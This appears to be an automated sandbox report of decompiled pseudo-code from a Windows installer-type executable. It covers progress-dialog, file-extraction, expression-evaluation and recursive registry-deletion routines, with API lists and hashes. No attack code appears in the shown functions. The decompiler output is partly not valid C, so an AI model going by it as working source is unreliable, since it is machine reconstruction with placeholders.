                                                            • Part of subcall function 00405374: SetWindowTextA.USER32(0042A098,0042A098), ref: 004053E2
                                                            • Part of subcall function 00405374: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00405408
                                                            • Part of subcall function 00405374: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00405422
                                                            • Part of subcall function 00405374: SendMessageA.USER32(?,00001013,?,00000000), ref: 00405430
                                                          • CreateDialogParamA.USER32(0000006F,00000000,00402DBA,00000000), ref: 00402EDA
                                                          • ShowWindow.USER32(00000000,00000005), ref: 00402EE8
                                                            • Part of subcall function 00402E36: MulDiv.KERNEL32(?,00000064,?), ref: 00402E4B
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.210091927.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.210082002.0000000000400000.00000002.00020000.sdmp Download File
                                                          • Associated: 00000001.00000002.210106552.0000000000408000.00000002.00020000.sdmp Download File
                                                          • Associated: 00000001.00000002.210112543.000000000040A000.00000004.00020000.sdmp Download File
                                                          • Associated: 00000001.00000002.210125931.000000000041D000.00000004.00020000.sdmp Download File
                                                          • Associated: 00000001.00000002.210140602.000000000042C000.00000004.00020000.sdmp Download File
                                                          • Associated: 00000001.00000002.210144999.0000000000435000.00000004.00020000.sdmp Download File
                                                          • Associated: 00000001.00000002.210150471.0000000000438000.00000002.00020000.sdmp Download File
                                                          Similarity
                                                          • API ID: MessageSendWindow$lstrlen$CountCreateDestroyDialogParamShowTextTicklstrcatwsprintf
                                                          • String ID: ... %d%%
                                                          • API String ID: 722711167-2449383134
                                                          • Opcode ID: af689138a4f0791e1d33c6a99b0ca250243e8de88bd1a5e7849c729b12dc1877
                                                          • Instruction ID: 353ceaab55596b447025a7e101de02e0418331127a37b2bc27e5d18c7d4c6952
                                                          • Opcode Fuzzy Hash: af689138a4f0791e1d33c6a99b0ca250243e8de88bd1a5e7849c729b12dc1877
                                                          • Instruction Fuzzy Hash: DA015E70581214ABCB61AB61EF0DA5B766CAB10745B94403BF901F11E0C7B9594ACBEE
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 100%
                                                          			E00404C24(struct HWND__* _a4, intOrPtr _a8) {
                                                          				long _v8;
                                                          				signed char _v12;
                                                          				unsigned int _v16;
                                                          				void* _v20;
                                                          				intOrPtr _v24;
                                                          				long _v56;
                                                          				void* _v60;
                                                          				long _t15;
                                                          				unsigned int _t19;
                                                          				signed int _t25;
                                                          				struct HWND__* _t28;
                                                          
                                                          				_t28 = _a4;
                                                          				_t15 = SendMessageA(_t28, 0x110a, 9, 0);
                                                          				if(_a8 == 0) {
                                                          					L4:
                                                          					_v56 = _t15;
                                                          					_v60 = 4;
                                                          					SendMessageA(_t28, 0x110c, 0,  &_v60);
                                                          					return _v24;
                                                          				}
                                                          				_t19 = GetMessagePos();
                                                          				_v16 = _t19 >> 0x10;
                                                          				_v20 = _t19;
                                                          				ScreenToClient(_t28,  &_v20);
                                                          				_t25 = SendMessageA(_t28, 0x1111, 0,  &_v20);
                                                          				if((_v12 & 0x00000066) != 0) {
                                                          					_t15 = _v8;
                                                          					goto L4;
                                                          				}
                                                          				return _t25 | 0xffffffff;
                                                          			}














                                                          0x00404c32
                                                          0x00404c3f
                                                          0x00404c45
                                                          0x00404c83
                                                          0x00404c83
                                                          0x00404c92
                                                          0x00404c99
                                                          0x00000000
                                                          0x00404c9b
                                                          0x00404c47
                                                          0x00404c56
                                                          0x00404c5e
                                                          0x00404c61
                                                          0x00404c73
                                                          0x00404c79
                                                          0x00404c80
                                                          0x00000000
                                                          0x00404c80
                                                          0x00000000

                                                          APIs
                                                          • SendMessageA.USER32(?,0000110A,00000009,00000000), ref: 00404C3F
                                                          • GetMessagePos.USER32 ref: 00404C47
                                                          • ScreenToClient.USER32 ref: 00404C61
                                                          • SendMessageA.USER32(?,00001111,00000000,?), ref: 00404C73
                                                          • SendMessageA.USER32(?,0000110C,00000000,?), ref: 00404C99
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.210091927.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.210082002.0000000000400000.00000002.00020000.sdmp Download File
                                                          • Associated: 00000001.00000002.210106552.0000000000408000.00000002.00020000.sdmp Download File
                                                          • Associated: 00000001.00000002.210112543.000000000040A000.00000004.00020000.sdmp Download File
                                                          • Associated: 00000001.00000002.210125931.000000000041D000.00000004.00020000.sdmp Download File
                                                          • Associated: 00000001.00000002.210140602.000000000042C000.00000004.00020000.sdmp Download File
                                                          • Associated: 00000001.00000002.210144999.0000000000435000.00000004.00020000.sdmp Download File
                                                          • Associated: 00000001.00000002.210150471.0000000000438000.00000002.00020000.sdmp Download File
                                                          Similarity
                                                          • API ID: Message$Send$ClientScreen
                                                          • String ID: f
                                                          • API String ID: 41195575-1993550816
                                                          • Opcode ID: fae6ee4ef260730fd0e6baeb46c05ac4d0d99299cd6b7910a3b5b88b2e21feb9
                                                          • Instruction ID: c5e601a7729174d758105895f59292295b70f69fbdb61488410ae18d48939760
                                                          • Opcode Fuzzy Hash: fae6ee4ef260730fd0e6baeb46c05ac4d0d99299cd6b7910a3b5b88b2e21feb9
                                                          • Instruction Fuzzy Hash: C8015A71900219BAEB10DBA4DD85BFFBBBCAF55B21F10012BBA40B61D0C7B499058BA4
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 100%
                                                          			E00402DBA(struct HWND__* _a4, intOrPtr _a8) {
                                                          				char _v68;
                                                          				void* _t11;
                                                          				CHAR* _t19;
                                                          
                                                          				if(_a8 == 0x110) {
                                                          					SetTimer(_a4, 1, 0xfa, 0);
                                                          					_a8 = 0x113;
                                                          				}
                                                          				if(_a8 == 0x113) {
                                                          					_t11 = E00402E36();
                                                          					_t19 = "unpacking data: %d%%";
                                                          					if( *0x42f454 == 0) {
                                                          						_t19 = "verifying installer: %d%%";
                                                          					}
                                                          					wsprintfA( &_v68, _t19, _t11);
                                                          					SetWindowTextA(_a4,  &_v68);
                                                          					SetDlgItemTextA(_a4, 0x406,  &_v68);
                                                          				}
                                                          				return 0;
                                                          			}






                                                          0x00402dc7
                                                          0x00402dd5
                                                          0x00402ddb
                                                          0x00402ddb
                                                          0x00402de9
                                                          0x00402deb
                                                          0x00402df7
                                                          0x00402dfc
                                                          0x00402dfe
                                                          0x00402dfe
                                                          0x00402e09
                                                          0x00402e19
                                                          0x00402e2b
                                                          0x00402e2b
                                                          0x00402e33

                                                          APIs
                                                          • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402DD5
                                                          • wsprintfA.USER32 ref: 00402E09
                                                          • SetWindowTextA.USER32(?,?), ref: 00402E19
                                                          • SetDlgItemTextA.USER32 ref: 00402E2B
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.210091927.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.210082002.0000000000400000.00000002.00020000.sdmp Download File
                                                          • Associated: 00000001.00000002.210106552.0000000000408000.00000002.00020000.sdmp Download File
                                                          • Associated: 00000001.00000002.210112543.000000000040A000.00000004.00020000.sdmp Download File
                                                          • Associated: 00000001.00000002.210125931.000000000041D000.00000004.00020000.sdmp Download File
                                                          • Associated: 00000001.00000002.210140602.000000000042C000.00000004.00020000.sdmp Download File
                                                          • Associated: 00000001.00000002.210144999.0000000000435000.00000004.00020000.sdmp Download File
                                                          • Associated: 00000001.00000002.210150471.0000000000438000.00000002.00020000.sdmp Download File
                                                          Similarity
                                                          • API ID: Text$ItemTimerWindowwsprintf
                                                          • String ID: unpacking data: %d%%$verifying installer: %d%%
                                                          • API String ID: 1451636040-1158693248
                                                          • Opcode ID: e89816a8dfaa52ff9135695e85eb4a48f8702048c86a46640504a18df176bae7
                                                          • Instruction ID: aa0a6e9b687c9e0f5cd6186ccbd59e0a61a019e4c0b35091a05eaf10890a9e1d
                                                          • Opcode Fuzzy Hash: e89816a8dfaa52ff9135695e85eb4a48f8702048c86a46640504a18df176bae7
                                                          • Instruction Fuzzy Hash: A5F06D7054020CFBEF206F60CE0ABAE3769EB10345F00803AFA06B51D0CBB899558F9A
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 93%
                                                          			E004027DF(void* __ebx, void* __eflags) {
                                                          				void* _t26;
                                                          				long _t31;
                                                          				void* _t45;
                                                          				void* _t49;
                                                          				void* _t51;
                                                          				void* _t54;
                                                          				void* _t55;
                                                          				void* _t56;
                                                          
                                                          				_t45 = __ebx;
                                                          				 *((intOrPtr*)(_t56 - 0xc)) = 0xfffffd66;
                                                          				_t50 = E00402BCE(0xfffffff0);
                                                          				 *(_t56 - 0x78) = _t23;
                                                          				if(E00405C52(_t50) == 0) {
                                                          					E00402BCE(0xffffffed);
                                                          				}
                                                          				E00405DC1(_t50);
                                                          				_t26 = E00405DE6(_t50, 0x40000000, 2);
                                                          				 *(_t56 + 8) = _t26;
                                                          				if(_t26 != 0xffffffff) {
                                                          					_t31 =  *0x42f458;
                                                          					 *(_t56 - 0x30) = _t31;
                                                          					_t49 = GlobalAlloc(0x40, _t31);
                                                          					if(_t49 != _t45) {
                                                          						E0040343E(_t45);
                                                          						E00403428(_t49,  *(_t56 - 0x30));
                                                          						_t54 = GlobalAlloc(0x40,  *(_t56 - 0x20));
                                                          						 *(_t56 - 0x38) = _t54;
                                                          						if(_t54 != _t45) {
                                                          							E004031B7(_t47,  *((intOrPtr*)(_t56 - 0x24)), _t45, _t54,  *(_t56 - 0x20));
                                                          							while( *_t54 != _t45) {
                                                          								_t47 =  *_t54;
                                                          								_t55 = _t54 + 8;
                                                          								 *(_t56 - 0x8c) =  *_t54;
                                                          								E00405DA1( *((intOrPtr*)(_t54 + 4)) + _t49, _t55, _t47);
                                                          								_t54 = _t55 +  *(_t56 - 0x8c);
                                                          							}
                                                          							GlobalFree( *(_t56 - 0x38));
                                                          						}
                                                          						E00405E8D( *(_t56 + 8), _t49,  *(_t56 - 0x30));
                                                          						GlobalFree(_t49);
                                                          						 *((intOrPtr*)(_t56 - 0xc)) = E004031B7(_t47, 0xffffffff,  *(_t56 + 8), _t45, _t45);
                                                          					}
                                                          					CloseHandle( *(_t56 + 8));
                                                          				}
                                                          				_t51 = 0xfffffff3;
                                                          				if( *((intOrPtr*)(_t56 - 0xc)) < _t45) {
                                                          					_t51 = 0xffffffef;
                                                          					DeleteFileA( *(_t56 - 0x78));
                                                          					 *((intOrPtr*)(_t56 - 4)) = 1;
                                                          				}
                                                          				_push(_t51);
                                                          				E00401423();
                                                          				 *0x42f4e8 =  *0x42f4e8 +  *((intOrPtr*)(_t56 - 4));
                                                          				return 0;
                                                          			}











                                                          0x004027df
                                                          0x004027e1
                                                          0x004027ed
                                                          0x004027f0
                                                          0x004027fa
                                                          0x004027fe
                                                          0x004027fe
                                                          0x00402804
                                                          0x00402811
                                                          0x00402819
                                                          0x0040281c
                                                          0x00402822
                                                          0x00402830
                                                          0x00402835
                                                          0x00402839
                                                          0x0040283c
                                                          0x00402845
                                                          0x00402851
                                                          0x00402855
                                                          0x00402858
                                                          0x00402862
                                                          0x00402887
                                                          0x00402869
                                                          0x0040286e
                                                          0x00402876
                                                          0x0040287c
                                                          0x00402881
                                                          0x00402881
                                                          0x0040288e
                                                          0x0040288e
                                                          0x0040289b
                                                          0x004028a1
                                                          0x004028b3
                                                          0x004028b3
                                                          0x004028b9
                                                          0x004028b9
                                                          0x004028c4
                                                          0x004028c5
                                                          0x004028c9
                                                          0x004028cd
                                                          0x004028d3
                                                          0x004028d3
                                                          0x004028da
                                                          0x004022dd
                                                          0x00402a5d
                                                          0x00402a69

                                                          APIs
                                                          • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,?,?,?,000000F0), ref: 00402833
                                                          • GlobalAlloc.KERNEL32(00000040,?,00000000,?,?,?,?,?,000000F0), ref: 0040284F
                                                          • GlobalFree.KERNEL32 ref: 0040288E
                                                          • GlobalFree.KERNEL32 ref: 004028A1
                                                          • CloseHandle.KERNEL32(?,?,?,?,000000F0), ref: 004028B9
                                                          • DeleteFileA.KERNEL32(?,00000000,40000000,00000002,00000000,00000000,?,?,?,000000F0), ref: 004028CD
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.210091927.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.210082002.0000000000400000.00000002.00020000.sdmp Download File
                                                          • Associated: 00000001.00000002.210106552.0000000000408000.00000002.00020000.sdmp Download File
                                                          • Associated: 00000001.00000002.210112543.000000000040A000.00000004.00020000.sdmp Download File
                                                          • Associated: 00000001.00000002.210125931.000000000041D000.00000004.00020000.sdmp Download File
                                                          • Associated: 00000001.00000002.210140602.000000000042C000.00000004.00020000.sdmp Download File
                                                          • Associated: 00000001.00000002.210144999.0000000000435000.00000004.00020000.sdmp Download File
                                                          • Associated: 00000001.00000002.210150471.0000000000438000.00000002.00020000.sdmp Download File
                                                          Similarity
                                                          • API ID: Global$AllocFree$CloseDeleteFileHandle
                                                          • String ID:
                                                          • API String ID: 2667972263-0
                                                          • Opcode ID: 10aa94e9192e65a0b09259698f99f40e5440345eda598c6609a5c103b0ccd052
                                                          • Instruction ID: 6e19ad8f311a8fe4d121ff6d49c8506e1ed5368105aa9b5939d25a16afe37da6
                                                          • Opcode Fuzzy Hash: 10aa94e9192e65a0b09259698f99f40e5440345eda598c6609a5c103b0ccd052
                                                          • Instruction Fuzzy Hash: C0219F72800124BBDF217FA5CE48D9E7E79EF09324F14823EF450762D1CA7949418FA8
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 97%
                                                          			E740D1837(signed int __edx, void* __eflags, void* _a8, void* _a16) {
                                                          				void* _v8;
                                                          				signed int _v12;
                                                          				signed int _v20;
                                                          				signed int _v24;
                                                          				char _v52;
                                                          				void _t45;
                                                          				void _t46;
                                                          				signed int _t47;
                                                          				signed int _t48;
                                                          				signed int _t57;
                                                          				signed int _t58;
                                                          				signed int _t59;
                                                          				signed int _t60;
                                                          				signed int _t61;
                                                          				void* _t67;
                                                          				void* _t68;
                                                          				void* _t69;
                                                          				void* _t70;
                                                          				void* _t71;
                                                          				signed int _t77;
                                                          				void* _t81;
                                                          				signed int _t83;
                                                          				signed int _t85;
                                                          				signed int _t87;
                                                          				signed int _t90;
                                                          				void* _t101;
                                                          
                                                          				_t85 = __edx;
                                                          				 *0x740d405c = _a8;
                                                          				_t77 = 0;
                                                          				 *0x740d4060 = _a16;
                                                          				_v12 = 0;
                                                          				_v8 = E740D123B();
                                                          				_t90 = E740D12FE(_t42);
                                                          				_t87 = _t85;
                                                          				_t81 = E740D123B();
                                                          				_a8 = _t81;
                                                          				_t45 =  *_t81;
                                                          				if(_t45 != 0x7e && _t45 != 0x21) {
                                                          					_a16 = E740D123B();
                                                          					_t77 = E740D12FE(_t74);
                                                          					_v12 = _t85;
                                                          					GlobalFree(_a16);
                                                          					_t81 = _a8;
                                                          				}
                                                          				_t46 =  *_t81;
                                                          				_t101 = _t46 - 0x2f;
                                                          				if(_t101 > 0) {
                                                          					_t47 = _t46 - 0x3c;
                                                          					__eflags = _t47;
                                                          					if(_t47 == 0) {
                                                          						__eflags =  *((char*)(_t81 + 1)) - 0x3c;
                                                          						if( *((char*)(_t81 + 1)) != 0x3c) {
                                                          							__eflags = _t87 - _v12;
                                                          							if(__eflags > 0) {
                                                          								L56:
                                                          								_t48 = 0;
                                                          								__eflags = 0;
                                                          								L57:
                                                          								asm("cdq");
                                                          								L58:
                                                          								_t90 = _t48;
                                                          								_t87 = _t85;
                                                          								L59:
                                                          								E740D1429(_t85, _t90, _t87,  &_v52);
                                                          								E740D1266( &_v52);
                                                          								GlobalFree(_v8);
                                                          								return GlobalFree(_a8);
                                                          							}
                                                          							if(__eflags < 0) {
                                                          								L49:
                                                          								__eflags = 0;
                                                          								L50:
                                                          								_t48 = 1;
                                                          								goto L57;
                                                          							}
                                                          							__eflags = _t90 - _t77;
                                                          							if(_t90 < _t77) {
                                                          								goto L49;
                                                          							}
                                                          							goto L56;
                                                          						}
                                                          						_t85 = _t87;
                                                          						_t48 = E740D2EF0(_t90, _t77, _t85);
                                                          						goto L58;
                                                          					}
                                                          					_t57 = _t47 - 1;
                                                          					__eflags = _t57;
                                                          					if(_t57 == 0) {
                                                          						__eflags = _t90 - _t77;
                                                          						if(_t90 != _t77) {
                                                          							goto L56;
                                                          						}
                                                          						__eflags = _t87 - _v12;
                                                          						if(_t87 != _v12) {
                                                          							goto L56;
                                                          						}
                                                          						goto L49;
                                                          					}
                                                          					_t58 = _t57 - 1;
                                                          					__eflags = _t58;
                                                          					if(_t58 == 0) {
                                                          						__eflags =  *((char*)(_t81 + 1)) - 0x3e;
                                                          						if( *((char*)(_t81 + 1)) != 0x3e) {
                                                          							__eflags = _t87 - _v12;
                                                          							if(__eflags < 0) {
                                                          								goto L56;
                                                          							}
                                                          							if(__eflags > 0) {
                                                          								goto L49;
                                                          							}
                                                          							__eflags = _t90 - _t77;
                                                          							if(_t90 <= _t77) {
                                                          								goto L56;
                                                          							}
                                                          							goto L49;
                                                          						}
                                                          						__eflags =  *((char*)(_t81 + 2)) - 0x3e;
                                                          						_t85 = _t87;
                                                          						_t59 = _t90;
                                                          						_t83 = _t77;
                                                          						if( *((char*)(_t81 + 2)) != 0x3e) {
                                                          							_t48 = E740D2F10(_t59, _t83, _t85);
                                                          						} else {
                                                          							_t48 = E740D2F40(_t59, _t83, _t85);
                                                          						}
                                                          						goto L58;
                                                          					}
                                                          					_t60 = _t58 - 0x20;
                                                          					__eflags = _t60;
                                                          					if(_t60 == 0) {
                                                          						_t90 = _t90 ^ _t77;
                                                          						_t87 = _t87 ^ _v12;
                                                          						goto L59;
                                                          					}
                                                          					_t61 = _t60 - 0x1e;
                                                          					__eflags = _t61;
                                                          					if(_t61 == 0) {
                                                          						__eflags =  *((char*)(_t81 + 1)) - 0x7c;
                                                          						if( *((char*)(_t81 + 1)) != 0x7c) {
                                                          							_t90 = _t90 | _t77;
                                                          							_t87 = _t87 | _v12;
                                                          							goto L59;
                                                          						}
                                                          						__eflags = _t90 | _t87;
                                                          						if((_t90 | _t87) != 0) {
                                                          							goto L49;
                                                          						}
                                                          						__eflags = _t77 | _v12;
                                                          						if((_t77 | _v12) != 0) {
                                                          							goto L49;
                                                          						}
                                                          						goto L56;
                                                          					}
                                                          					__eflags = _t61 == 0;
                                                          					if(_t61 == 0) {
                                                          						_t90 =  !_t90;
                                                          						_t87 =  !_t87;
                                                          					}
                                                          					goto L59;
                                                          				}
                                                          				if(_t101 == 0) {
                                                          					L21:
                                                          					__eflags = _t77 | _v12;
                                                          					if((_t77 | _v12) != 0) {
                                                          						_v24 = E740D2D80(_t90, _t87, _t77, _v12);
                                                          						_v20 = _t85;
                                                          						_t48 = E740D2E30(_t90, _t87, _t77, _v12);
                                                          						_t81 = _a8;
                                                          					} else {
                                                          						_v24 = _v24 & 0x00000000;
                                                          						_v20 = _v20 & 0x00000000;
                                                          						_t48 = _t90;
                                                          						_t85 = _t87;
                                                          					}
                                                          					__eflags =  *_t81 - 0x2f;
                                                          					if( *_t81 != 0x2f) {
                                                          						goto L58;
                                                          					} else {
                                                          						_t90 = _v24;
                                                          						_t87 = _v20;
                                                          						goto L59;
                                                          					}
                                                          				}
                                                          				_t67 = _t46 - 0x21;
                                                          				if(_t67 == 0) {
                                                          					_t48 = 0;
                                                          					__eflags = _t90 | _t87;
                                                          					if((_t90 | _t87) != 0) {
                                                          						goto L57;
                                                          					}
                                                          					goto L50;
                                                          				}
                                                          				_t68 = _t67 - 4;
                                                          				if(_t68 == 0) {
                                                          					goto L21;
                                                          				}
                                                          				_t69 = _t68 - 1;
                                                          				if(_t69 == 0) {
                                                          					__eflags =  *((char*)(_t81 + 1)) - 0x26;
                                                          					if( *((char*)(_t81 + 1)) != 0x26) {
                                                          						_t90 = _t90 & _t77;
                                                          						_t87 = _t87 & _v12;
                                                          						goto L59;
                                                          					}
                                                          					__eflags = _t90 | _t87;
                                                          					if((_t90 | _t87) == 0) {
                                                          						goto L56;
                                                          					}
                                                          					__eflags = _t77 | _v12;
                                                          					if((_t77 | _v12) == 0) {
                                                          						goto L56;
                                                          					}
                                                          					goto L49;
                                                          				}
                                                          				_t70 = _t69 - 4;
                                                          				if(_t70 == 0) {
                                                          					_t48 = E740D2D40(_t90, _t87, _t77, _v12);
                                                          					goto L58;
                                                          				} else {
                                                          					_t71 = _t70 - 1;
                                                          					if(_t71 == 0) {
                                                          						_t90 = _t90 + _t77;
                                                          						asm("adc edi, [ebp-0x8]");
                                                          					} else {
                                                          						if(_t71 == 0) {
                                                          							_t90 = _t90 - _t77;
                                                          							asm("sbb edi, [ebp-0x8]");
                                                          						}
                                                          					}
                                                          					goto L59;
                                                          				}
                                                          			}





























                                                          0x740d1837
                                                          0x740d1841
                                                          0x740d184a
                                                          0x740d184d
                                                          0x740d1852
                                                          0x740d185b
                                                          0x740d1864
                                                          0x740d1866
                                                          0x740d186d
                                                          0x740d186f
                                                          0x740d1872
                                                          0x740d1876
                                                          0x740d1882
                                                          0x740d188b
                                                          0x740d1890
                                                          0x740d1893
                                                          0x740d1899
                                                          0x740d1899
                                                          0x740d189c
                                                          0x740d189f
                                                          0x740d18a2
                                                          0x740d1968
                                                          0x740d1968
                                                          0x740d196b
                                                          0x740d19e5
                                                          0x740d19e9
                                                          0x740d19f8
                                                          0x740d19fb
                                                          0x740d1a03
                                                          0x740d1a03
                                                          0x740d1a03
                                                          0x740d1a05
                                                          0x740d1a05
                                                          0x740d1a06
                                                          0x740d1a06
                                                          0x740d1a08
                                                          0x740d1a0a
                                                          0x740d1a10
                                                          0x740d1a19
                                                          0x740d1a2a
                                                          0x740d1a35
                                                          0x740d1a35
                                                          0x740d19fd
                                                          0x740d19e0
                                                          0x740d19e0
                                                          0x740d19e2
                                                          0x740d19e2
                                                          0x00000000
                                                          0x740d19e2
                                                          0x740d19ff
                                                          0x740d1a01
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x740d1a01
                                                          0x740d19ed
                                                          0x740d19f1
                                                          0x00000000
                                                          0x740d19f1
                                                          0x740d196d
                                                          0x740d196d
                                                          0x740d196e
                                                          0x740d19d7
                                                          0x740d19d9
                                                          0x00000000
                                                          0x00000000
                                                          0x740d19db
                                                          0x740d19de
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x740d19de
                                                          0x740d1970
                                                          0x740d1970
                                                          0x740d1971
                                                          0x740d19aa
                                                          0x740d19ae
                                                          0x740d19ca
                                                          0x740d19cd
                                                          0x00000000
                                                          0x00000000
                                                          0x740d19cf
                                                          0x00000000
                                                          0x00000000
                                                          0x740d19d1
                                                          0x740d19d3
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x740d19d5
                                                          0x740d19b0
                                                          0x740d19b4
                                                          0x740d19b6
                                                          0x740d19b8
                                                          0x740d19ba
                                                          0x740d19c3
                                                          0x740d19bc
                                                          0x740d19bc
                                                          0x740d19bc
                                                          0x00000000
                                                          0x740d19ba
                                                          0x740d1973
                                                          0x740d1973
                                                          0x740d1976
                                                          0x740d19a3
                                                          0x740d19a5
                                                          0x00000000
                                                          0x740d19a5
                                                          0x740d1978
                                                          0x740d1978
                                                          0x740d197b
                                                          0x740d198b
                                                          0x740d198f
                                                          0x740d199c
                                                          0x740d199e
                                                          0x00000000
                                                          0x740d199e
                                                          0x740d1991
                                                          0x740d1993
                                                          0x00000000
                                                          0x00000000
                                                          0x740d1995
                                                          0x740d1998
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x740d199a
                                                          0x740d197e
                                                          0x740d197f
                                                          0x740d1985
                                                          0x740d1987
                                                          0x740d1987
                                                          0x00000000
                                                          0x740d197f
                                                          0x740d18a8
                                                          0x740d1920
                                                          0x740d1922
                                                          0x740d1925
                                                          0x740d1943
                                                          0x740d1946
                                                          0x740d194c
                                                          0x740d1951
                                                          0x740d1927
                                                          0x740d1927
                                                          0x740d192b
                                                          0x740d192f
                                                          0x740d1931
                                                          0x740d1931
                                                          0x740d1954
                                                          0x740d1957
                                                          0x00000000
                                                          0x740d195d
                                                          0x740d195d
                                                          0x740d1960
                                                          0x00000000
                                                          0x740d1960
                                                          0x740d1957
                                                          0x740d18aa
                                                          0x740d18ad
                                                          0x740d1911
                                                          0x740d1913
                                                          0x740d1915
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x740d191b
                                                          0x740d18af
                                                          0x740d18b2
                                                          0x00000000
                                                          0x00000000
                                                          0x740d18b4
                                                          0x740d18b5
                                                          0x740d18eb
                                                          0x740d18ef
                                                          0x740d1907
                                                          0x740d1909
                                                          0x00000000
                                                          0x740d1909
                                                          0x740d18f1
                                                          0x740d18f3
                                                          0x00000000
                                                          0x00000000
                                                          0x740d18f9
                                                          0x740d18fc
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x740d1902
                                                          0x740d18b7
                                                          0x740d18ba
                                                          0x740d18e1
                                                          0x00000000
                                                          0x740d18bc
                                                          0x740d18bc
                                                          0x740d18bd
                                                          0x740d18d1
                                                          0x740d18d3
                                                          0x740d18bf
                                                          0x740d18c1
                                                          0x740d18c7
                                                          0x740d18c9
                                                          0x740d18c9
                                                          0x740d18c1
                                                          0x00000000
                                                          0x740d18bd

                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.211149237.00000000740D1000.00000020.00020000.sdmp, Offset: 740D0000, based on PE: true
                                                          • Associated: 00000001.00000002.211137968.00000000740D0000.00000002.00020000.sdmp Download File
                                                          • Associated: 00000001.00000002.211158192.00000000740D3000.00000002.00020000.sdmp Download File
                                                          • Associated: 00000001.00000002.211175377.00000000740D5000.00000002.00020000.sdmp Download File
                                                          Similarity
                                                          • API ID: FreeGlobal
                                                          • String ID:
                                                          • API String ID: 2979337801-0
                                                          • Opcode ID: 4bf19fc10ffa003212a0718c4373e7fe109504a04e2b27c12658d0a459b2ae49
                                                          • Instruction ID: b5d8b94cdcf1c3066cb020afbe5c5013921c9d3b70336f02eb9c8408b72fdea2
                                                          • Opcode Fuzzy Hash: 4bf19fc10ffa003212a0718c4373e7fe109504a04e2b27c12658d0a459b2ae49
                                                          • Instruction Fuzzy Hash: 1051D572E04354AEDB12CFB9C8445AEFBF7AB88A55F140269E406AB10CCF355B4D8F52
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 48%
                                                          			E00402CD0(void* __eflags, void* _a4, char* _a8, signed int _a12) {
                                                          				void* _v8;
                                                          				int _v12;
                                                          				char _v276;
                                                          				void* _t27;
                                                          				signed int _t33;
                                                          				intOrPtr* _t35;
                                                          				signed int _t45;
                                                          				signed int _t46;
                                                          				signed int _t47;
                                                          
                                                          				_t46 = _a12;
                                                          				_t47 = _t46 & 0x00000300;
                                                          				_t45 = _t46 & 0x00000001;
                                                          				_t27 = E004060D3(__eflags, _a4, _a8, _t47 | 0x00000009,  &_v8);
                                                          				if(_t27 == 0) {
                                                          					if((_a12 & 0x00000002) == 0) {
                                                          						L3:
                                                          						_push(0x105);
                                                          						_push( &_v276);
                                                          						_push(0);
                                                          						while(RegEnumKeyA(_v8, ??, ??, ??) == 0) {
                                                          							__eflags = _t45;
                                                          							if(__eflags != 0) {
                                                          								L10:
                                                          								RegCloseKey(_v8);
                                                          								return 0x3eb;
                                                          							}
                                                          							_t33 = E00402CD0(__eflags, _v8,  &_v276, _a12);
                                                          							__eflags = _t33;
                                                          							if(_t33 != 0) {
                                                          								break;
                                                          							}
                                                          							_push(0x105);
                                                          							_push( &_v276);
                                                          							_push(_t45);
                                                          						}
                                                          						RegCloseKey(_v8);
                                                          						_t35 = E00406656(3);
                                                          						if(_t35 != 0) {
                                                          							return  *_t35(_a4, _a8, _t47, 0);
                                                          						}
                                                          						return RegDeleteKeyA(_a4, _a8);
                                                          					}
                                                          					_v12 = 0;
                                                          					if(RegEnumValueA(_v8, 0,  &_v276,  &_v12, 0, 0, 0, 0) != 0x103) {
                                                          						goto L10;
                                                          					}
                                                          					goto L3;
                                                          				}
                                                          				return _t27;
                                                          			}












                                                          0x00402cdb
                                                          0x00402ce4
                                                          0x00402ced
                                                          0x00402cf9
                                                          0x00402d02
                                                          0x00402d0c
                                                          0x00402d31
                                                          0x00402d37
                                                          0x00402d3c
                                                          0x00402d3d
                                                          0x00402d6d
                                                          0x00402d46
                                                          0x00402d48
                                                          0x00402d98
                                                          0x00402d9b
                                                          0x00000000
                                                          0x00402da1
                                                          0x00402d57
                                                          0x00402d5c
                                                          0x00402d5e
                                                          0x00000000
                                                          0x00000000
                                                          0x00402d66
                                                          0x00402d6b
                                                          0x00402d6c
                                                          0x00402d6c
                                                          0x00402d79
                                                          0x00402d81
                                                          0x00402d88
                                                          0x00000000
                                                          0x00402db1
                                                          0x00000000
                                                          0x00402d90
                                                          0x00402d1c
                                                          0x00402d2f
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00402d2f
                                                          0x00402db7

                                                          APIs
                                                          • RegEnumValueA.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000,?,?,00100020,?,?,?), ref: 00402D24
                                                          • RegEnumKeyA.ADVAPI32(?,00000000,?,00000105), ref: 00402D70
                                                          • RegCloseKey.ADVAPI32(?,?,?), ref: 00402D79
                                                          • RegDeleteKeyA.ADVAPI32(?,?), ref: 00402D90
                                                          • RegCloseKey.ADVAPI32(?,?,?), ref: 00402D9B
